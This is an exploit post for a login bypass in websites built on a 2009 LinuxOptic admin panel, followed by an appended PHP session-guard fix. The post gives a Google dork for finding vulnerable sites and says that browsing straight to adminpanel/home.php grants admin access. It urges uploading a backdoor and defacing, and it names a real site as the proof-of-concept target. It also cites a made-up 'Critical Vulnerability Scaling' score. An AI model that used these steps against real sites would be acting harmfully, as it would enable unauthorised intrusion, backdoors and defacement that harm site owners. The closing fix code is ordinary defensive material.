Linux Optic Web Design and development- Login Bypass

Hello,

I am posting my exploit, Linux Optic Web Design and development - Login Bypass, which has a CVS (Critical Vulnerability Scaling) score of 8.1 out of 10.

https://www.milw00rm.com/exploits/9777

http://www.vulnerability-lab.com/get_content.php?id=1585

https://packetstormsecurity.com/files/133356/LinuxOptic-CMS-2009-Authentication-Bypass.html

# Exploit Title: Direct login to admin panel without entering password
# Google Dork: Design by www.linuxoptic.com 2009
# Date: 2015-07-10
# Exploit Author: Aaditya Purani
# Vendor Homepage: www.linuxoptic.com
# Software Link: No software link
# Version: 2009 Web admin login panel
# Tested on: Kali Linux/ Windows 7
# CVE : Critical Vulnerability

Hello,
This is Aaditya Purani and I have found a critical bug in websites which have been designed by Linuxoptic.
First, type the dork "Design by www.linuxoptic.com 2009" in Google without the double quotes (").

Then find a site where "Design by www.linuxoptic.com 2009" is written in the footer.

Now go to its admin page: http://www.targetsite.com/adminpanel

After opening the admin panel, follow this link: http://www.targetsite.com/adminpanel/home.php

And voila, you will be directly logged into the admin panel, and you can also upload your backdoor and deface.

#POC: 
Site: http://www.carrefamily.com/

Its admin panel: http://www.carrefamily.com/adminpanel

Direct login to the admin panel: http://www.carrefamily.com/adminpanel/home.php
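The fix for this class of bypass is a server-side session check that every admin page runs before rendering anything. The following is an added example, not code from LinuxOptic or from the advisory; it assumes the root cause is that home.php never verifies a logged-in session, and the file name admin_guard.php, the login.php path and the session keys are assumptions.

```php
<?php
// admin_guard.php: required at the top of EVERY admin-panel page (home.php included).
// Added example, not LinuxOptic code. Assumption: the bypass exists because home.php
// renders without ever checking that the login handler actually ran.
declare(strict_types=1);

const ADMIN_IDLE_TIMEOUT = 1800; // seconds of inactivity before the session is dropped

function require_admin_login(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // Cookie flags: not readable by script, not sent cross-site, HTTPS only.
        session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax', 'secure' => true]);
        session_start();
    }

    // The only source of truth is server-side session state written by login.php.
    // Nothing in the request (URL, query string, hidden fields, cookie values) is trusted.
    if (empty($_SESSION['admin_id']) || empty($_SESSION['last_seen'])) {
        deny_and_redirect('/adminpanel/login.php');
    }

    // Idle timeout: an abandoned session must not stay valid forever.
    if (time() - (int) $_SESSION['last_seen'] > ADMIN_IDLE_TIMEOUT) {
        session_unset();
        session_destroy();
        deny_and_redirect('/adminpanel/login.php?expired=1');
    }
    $_SESSION['last_seen'] = time();
}

function deny_and_redirect(string $location): void
{
    // Redirect AND stop. A header() without exit is the classic mistake: the rest of
    // the page still renders, and a client that ignores Location gets the admin content.
    header('Location: ' . $location, true, 302);
    exit;
}

// login.php calls this only after the credentials have been verified.
function establish_admin_session(int $adminId): void
{
    session_regenerate_id(true); // new session id on privilege change (no fixation)
    $_SESSION['admin_id']  = $adminId;
    $_SESSION['last_seen'] = time();
}

// home.php then begins with:
//   require_once __DIR__ . '/admin_guard.php';
//   require_admin_login();
```

Putting the guard in a single shared include, rather than re-typing the check on each page, is what prevents one forgotten page from becoming the direct-access entry point described above.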

Thank you
